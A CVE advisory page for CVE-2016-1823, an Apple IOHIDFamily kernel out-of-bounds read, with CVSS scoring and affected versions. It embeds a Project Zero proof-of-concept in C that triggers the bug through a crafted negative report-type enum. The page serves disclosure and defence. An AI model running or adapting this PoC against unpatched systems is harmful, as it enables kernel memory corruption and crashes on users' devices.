CVE-2016-1823 : Detail

CVE-2016-1823

7.8
/
HIGH
Overflow
0.35%V3
Local
2016-05-20 08:00 +00:00
2016-12-15 09:57 +00:00

Alert for a CVE

Stay informed of any changes for a specific CVE.
Alert management

Descriptions

The IOHIDDevice::handleReportWithTime function in Apple iOS before 9.3.2, OS X before 10.11.5, tvOS before 9.2.1, and watchOS before 2.2.1 allows attackers to execute arbitrary code in a privileged context or cause a denial of service (out-of-bounds read and memory corruption) via a crafted IOHIDReportType enum, which triggers an incorrect cast, a different vulnerability than CVE-2016-1824.

Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-125 Out-of-bounds Read
The product reads data past the end, or before the beginning, of the intended buffer.

Metrics

Metric Score Severity CVSS Vector Source
V3.0 7.8 HIGH CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Local

A vulnerability exploitable with Local access means that the vulnerable component is not bound to the network stack, and the attacker's path is via read/write/execute capabilities. In some cases, the attacker may be logged in locally in order to exploit the vulnerability, otherwise, she may rely on User Interaction to execute a malicious file.

Attack Complexity

This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success against the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files to carry out an attack.

User Interaction

This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component.

Required

Successful exploitation of this vulnerability requires a user to take some action before the vulnerability can be exploited. For example, a successful exploit may only be possible during the installation of an application by a system administrator.

Base: Scope Metrics

An important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges.

Scope

Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports.

Unchanged

An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same.

Base: Impact Metrics

The Impact metrics refer to the properties of the impacted component.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability.

Environmental Metrics

nvd@nist.gov
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 39927

Publication date : 2016-06-09 22:00 +00:00
Author : Google Security Research
EDB Verified : Yes

/* Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=774 The IOHIDFamily function IOHIDDevice::handleReportWithTime takes at attacker controlled unchecked IOHIDReportType enum, which was cast from an int in either IOHIDLibUserClient::_setReport or _getReport: ret = target->setReport(arguments->structureInput, arguments->structureInputSize, (IOHIDReportType)arguments->scalarInput[0] handleReportWithTime only checks that the enum is <= the max, but enums are really just (signed) ints so there needs to be a lower-bounds check here too: if ( reportType >= kIOHIDReportTypeCount ) return kIOReturnBadArgument; reportType is then used here: element = GetHeadElement( GetReportHandlerSlot(reportID), reportType); while ( element ) { shouldTickle |= element->shouldTickleActivity(); changed |= element->processReport( reportID, where GetHeadElement is defined as: #define GetHeadElement(slot, type) _reportHandlers[slot].head[type] This leads to an OOB read off the head array followed by virtual function calls Tested on OS X 10.11.4 (15E65) on MacBookAir 5,2 Note that repro'ing this might be more involved on other models as there are a lot of different HID devices and drivers. I can provide panic logs if required. */ // ianbeer // clang -o hidlib_oob hidlib_oob.c -framework IOKit -framework CoreFoundation /* OS X kernel OOB read of object pointer due to insufficient checks in raw cast to enum type The IOHIDFamily function IOHIDDevice::handleReportWithTime takes at attacker controlled unchecked IOHIDReportType enum, which was cast from an int in either IOHIDLibUserClient::_setReport or _getReport: ret = target->setReport(arguments->structureInput, arguments->structureInputSize, (IOHIDReportType)arguments->scalarInput[0] handleReportWithTime only checks that the enum is <= the max, but enums are really just (signed) ints so there needs to be a lower-bounds check here too: if ( reportType >= kIOHIDReportTypeCount ) return kIOReturnBadArgument; reportType is then used here: element = GetHeadElement( GetReportHandlerSlot(reportID), reportType); while ( element ) { shouldTickle |= element->shouldTickleActivity(); changed |= element->processReport( reportID, where GetHeadElement is defined as: #define GetHeadElement(slot, type) _reportHandlers[slot].head[type] This leads to an OOB read off the head array followed by virtual function calls Tested on OS X 10.11.4 (15E65) on MacBookAir 5,2 Note that repro'ing this might be more involved on other models as there are a lot of different HID devices and drivers. I can provide panic logs if required. */ #include #include #include #include #include #include #include #include #include #include #include io_connect_t get_user_client(const char* name, int type) { kern_return_t err; CFDictionaryRef matching; io_service_t service; // try IOServiceMatching matching = IOServiceMatching(name); service = IOServiceGetMatchingService(kIOMasterPortDefault, matching); // consume a ref on matching if (service == MACH_PORT_NULL) { // try IOServiceNameMatching matching = IOServiceNameMatching(name); service = IOServiceGetMatchingService(kIOMasterPortDefault, matching); } if (service == MACH_PORT_NULL) { // try everything and look for a partial name match matching = IOServiceMatching("IOService"); io_iterator_t iterator; IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator); int found_it = 0; while ((service = IOIteratorNext(iterator)) != IO_OBJECT_NULL) { io_name_t object_name; IOObjectGetClass(service, object_name); if (strstr(object_name, name)) { found_it = 1; break; } IOObjectRelease(service); } IOObjectRelease(iterator); if (!found_it) { // couldn't find any matches for the name anywhere return MACH_PORT_NULL; } } io_connect_t conn = MACH_PORT_NULL; err = IOServiceOpen(service, mach_task_self(), type, &conn); if (err != KERN_SUCCESS){ printf("IOServiceOpen failed: %s\n", mach_error_string(err)); IOObjectRelease(service); return MACH_PORT_NULL; } IOObjectRelease(service); return conn; } kern_return_t poc(io_connect_t client){ unsigned int selector; uint64_t inputScalar[16]; size_t inputScalarCnt = 0; uint8_t inputStruct[4096]; size_t inputStructCnt = 0; uint64_t outputScalar[16]; uint32_t outputScalarCnt = 0; char outputStruct[4096]; size_t outputStructCnt = 0; inputScalar[0] = 0xe0000000; // cast to an enum (int) and no lower-bounds check inputScalar[1] = 0x00a90000; inputScalar[2] = 0; inputScalarCnt = 3; outputStructCnt = 0x1000; selector = 12; return IOConnectCallMethod( client, selector, inputScalar, inputScalarCnt, inputStruct, inputStructCnt, outputScalar, &outputScalarCnt, outputStruct, &outputStructCnt); } int main(int argc, char** argv){ io_connect_t client = get_user_client("AppleUSBTCButtons", 0); if (client == MACH_PORT_NULL) { printf("no client\n"); return 1; } poc(client); return 0; }

Products Mentioned

Configuraton 0

Apple>>Tvos >> Version To (excluding) 9.2.1

Configuraton 0

Apple>>Mac_os_x >> Version To (excluding) 10.11.5

Configuraton 0

Apple>>Iphone_os >> Version To (excluding) 9.3.2

Configuraton 0

Apple>>Watchos >> Version To (excluding) 2.2.1

References

https://support.apple.com/HT206567
Tags : x_refsource_CONFIRM
https://support.apple.com/HT206566
Tags : x_refsource_CONFIRM
https://www.exploit-db.com/exploits/39927/
Tags : exploit, x_refsource_EXPLOIT-DB
https://support.apple.com/HT206564
Tags : x_refsource_CONFIRM
http://www.securitytracker.com/id/1035890
Tags : vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/90698
Tags : vdb-entry, x_refsource_BID
https://support.apple.com/HT206568
Tags : x_refsource_CONFIRM
Click on the button to the left (OFF), to authorize the inscription of cookie improving the functionalities of the site. Click on the button to the left (Accept all), to unauthorize the inscription of cookie improving the functionalities of the site.